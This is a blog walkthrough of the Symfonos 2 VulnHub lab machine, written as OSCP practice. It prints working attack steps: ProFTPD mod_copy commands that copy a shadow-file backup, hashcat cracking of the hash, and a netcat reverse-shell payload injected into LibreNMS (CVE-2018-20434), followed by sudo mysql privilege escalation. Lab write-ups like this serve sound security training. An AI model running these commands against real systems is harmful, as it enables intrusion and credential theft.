Open in app

Sign in

Write

Sign in

https://unsplash.com/photos/HzT5Du-UFW8

SYMFONOS 2 Walkthrough — From Brute Force to Manual Exploitation to Make Titan Gods Cry — VulnHub — OSCP Practice

Nova
8 min readFeb 16, 2021

Symfonos 2 is another vulnerable VM from Symfonos series that listed in NetSecFocus doc as an OSCP like VM, in this writeup we witness how sometimes overthinking a sophisticated exploit is not a way in and how weak password in an environment can lead to an easy way in with brute force, then on privilege escalation we’ll see how to tunnel an internal application and using the knowledge from a public metasploit and its original python exploit to execute the manual exploitation that leads to RCE.

Preparation

  1. Download Symfonos 2 from VulnHub and bootup in VMware or Virtualbox
  2. Your favorite haxor env, in this article I am using a Kali VM
  3. Find IP address of Development one way to do it is with namp
nmap -sn 172.16.30.0/24

In this case my IP is 172.16.30.5

Tools

  • nmap
  • smbclient
  • ftp
  • nc
  • hashcat
  • ssh

Topics

  • ProFTPD 1.3.5 mod_copy manual exploit
  • Brute force attack on linux SHA512crypt (shadow file) using hashcat
  • Reading and understanding public exploit and using them to exploit a vulnerability maunally

Enumeration

# nmap -p- -sC -sV -T4 -v -o tcp.nmap 172.16.30.5Nmap scan report for 172.16.30.5
Host is up (0.0017s latency).
Not shown: 65530 closed ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         ProFTPD 1.3.5
22/tcp  open  ssh         OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 9d:f8:5f:87:20:e5:8c:fa:68:47:7d:71:62:08:ad:b9 (RSA)
|   256 04:2a:bb:06:56:ea:d1:93:1c:d2:78:0a:00:46:9d:85 (ECDSA)
|_  256 28:ad:ac:dc:7e:2a:1c:f6:4c:6b:47:f2:d6:22:5b:52 (ED25519)
80/tcp  open  http        WebFS httpd 1.21
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: webfs/1.21
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
Service Info: Host: SYMFONOS2; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelHost script results:
|_clock-skew: mean: 2h00m00s, deviation: 3h27m51s, median: 0s
| nbstat: NetBIOS name: SYMFONOS2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   SYMFONOS2<00>        Flags: <unique><active>
|   SYMFONOS2<03>        Flags: <unique><active>
|   SYMFONOS2<20>        Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.5.16-Debian)
|   Computer name: symfonos2
|   NetBIOS computer name: SYMFONOS2\x00
|   Domain name: \x00
|   FQDN: symfonos2
|_  System time: 2021-02-14T12:53:22-06:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-02-14T18:53:22
|_  start_date: N/A
  • Port 21 is ProFTPD 1.3.5 that has a famous mod_copy vulnerability we already saw on DIGITALWORLD.LOCAL JOY
  • Port 22 ssh is open so lets see if we login when the time comes!
  • Port 80 is WebFS httpd version 1.21 should look out if there is working exploit
  • Ports 139 and 445 related to smbd are open so lets check if there is something interesting

Ports 139, 445 (SMBD)

There is only anonymous account available and contains a backups folder with log.txt in it

Maybe one of the most important trait to utilize while hacking is to look to little details that generally hides from everyday eyes, maybe the most importat part of the log.txt is the first line that is very easy to miss!, it tells us that root backed up the shadow file to some random place /var/backups for some reasons.

Other thing to learn from log.txt is the available users on the server and the path for smb share. that is /home/aeolus/share

Trying to exploit the WebFS 1.21 from here didn’t work and feels like waste of time

Trying to exploit the server with ProFTPD exploit found here

https://github.com/t0kx/exploit-CVE-2015-3306

Would fail because it needs the webroot and we don’t know it and it won’t work but we look closer we can see that the exploit is actually let us run cpfr and cpto for ftp remotely so with that said we can move around stuff in the server just by connecting to port 22.

At this point feels like maybe bruteforce is the way in I personally have bad feeling when it comes to bruteforce feels like I’m missing something but there is nothing wrong with it, the point need to keep in mind is that bruteforcing directly ftp or ssh ports on a live server is never a good idea, specially in real word situation!, we won’t do it here either since we can fetch the hash from shadow file and bruteforce it locally

We have the path for shadow file backup and an smd share so lets transfer it to share and the get it from smb, also we can do the same with /etc/passwd file and unshadow it and use john the ripper but I will just get the hash from shadow file and run it through hashcat!

nc 172.16.30.5 21
site cpfr /var/backups/shadow.bak
site cpto /home/aeolus/share/shadow.bak
  • Read more about shadow file
  • Shadow file hash type is SHA512crypt hashcat code 1800

I copy aeolus hash to a text file and form a hashcat command with rockyou.txt wordlist

hashcat -m 1800 -a 0 -o pass.txt aeolusHash.txt -O /usr/share/wordlists/rockyou.txt

So hashcat cracked it in 16 seconds, pretty quick! :)

aeolus:sergioteamo

Fun part of brute force is that if it work ou you get to to walk in from da freakin front door!

With some enumeration like runnign lse.sh and walking the directories found out that apache is running and serving librenms locally from /opt/librenms via another account called cronus!

Checking out apache configs to confirm!

So next thing that draws the attention is to let apache server librenms to us with forwarding the 8080 port on server to 8181 on our local kali machine with ssh so I run following ssh command on kali and

ssh -L 8181:localhost:8080 aeolus@172.16.30.5

And open librenms on my kali

Well we already have password for aeolus account and it works on librenms too!

Trying to login with other users returns error

Also tried to find the version of installed Librenms but seems like because of bad installation it shows the wrong number and couldn’t find what version exactly is installed so kinda blind in here.

http://127.0.0.1:8181/validate/

A simple google for Librenms showed a promissing Remote Code Execution from 2018

Exploit-DB has the Metasploit version if the exploit but we can see the original exploit post in the refrence and read and understand how it exactly works from here and here

CVE-2018-20434
https://www.exploit-db.com/exploits/46970'References'     =>
        [
          [ 'CVE', '2018-20434' ],
          [ 'URL', 'https://shells.systems/librenms-v1-46-remote-code-execution-cve-2018-20434/' ],
          [ 'URL', 'https://gist.github.com/mhaskar/516df57aafd8c6e3a1d70765075d372d' ]
        ],

The original exploit post written by Askar is in python2 accessible in github gist, to be real in this case getting into fixing python2 code and run it takes longer time that reading the python code and simulate the RCE injection ourseleve so lets check out the python exploit

  • Of course it posisble to learn how exploit works with metasploit ruby code but the original python has a working payload that makes it faster in this case
https://gist.github.com/mhaskar/516df57aafd8c6e3a1d70765075d372d

Line 23 give us a payload

'$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {0} {1} >/tmp/f) #

On line 53 we learn that we need to create a new device with those fields filled and payload goes to community field

Lets add it

Now we have our nc -lvp 444 running on a terminal waiting for connection, we should find out how to execute our payload, lets checkout the exploit again see how it do it.

On line 91 request exploit function params we see it tries to capture and snmpwalk and the sends it to /ajax_output.php ok we have couple of keywords lets find it in web app

Capture was hiding under that gear menu after opening it and selecting SNMP tab our payload calls back :)

Got the shell and its with cronus account, next step would be trying to get the root which the way shows up by checking the NOPASSWD for sudo with sudo -l that shows us mysql can be run with sudo with NOPASSWD, A google query like

mysql sudo privesc

returns a golden website called gtfobins.github.io

https://gtfobins.github.io/gtfobins/mysql/

So lets do as it suggested and get the root!

Post Exploitation

Walking around and checking the Librenms installation also you can see the root flag too :)

Conclusions

Weak passwor, old ftp version, random shadow file backup around, buggy web app and random binary file with NOPASSWD lead us to own Symfonos 2, those Titan Gods Aeolus and Cronus need to learn these lessons to be more secure!

Symfonus 2 other that practicing with exploits thought me two big lesson and both of them are related to mindset

  • If a public exploit doesn’t work and if it feels like a dead-end it might be a dead end actually and better to go on and try brute forcing after all there is no patch for human stupidity and weak passwords are everywhre!
  • If you don’t know the version of an application and not sure if its vulnerable to an available exploit, best thing to do it to just test it and let it fail it it want to and in this case it might the correct version and worked!

Hope you enjoyed reading this!

Oscp
Penetration Testing
Writeup
Vulnhub
Information Security

--

--

Nova

Written by Nova

13 Followers

Breaking stuff to learn them, learning stuff to break them!

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams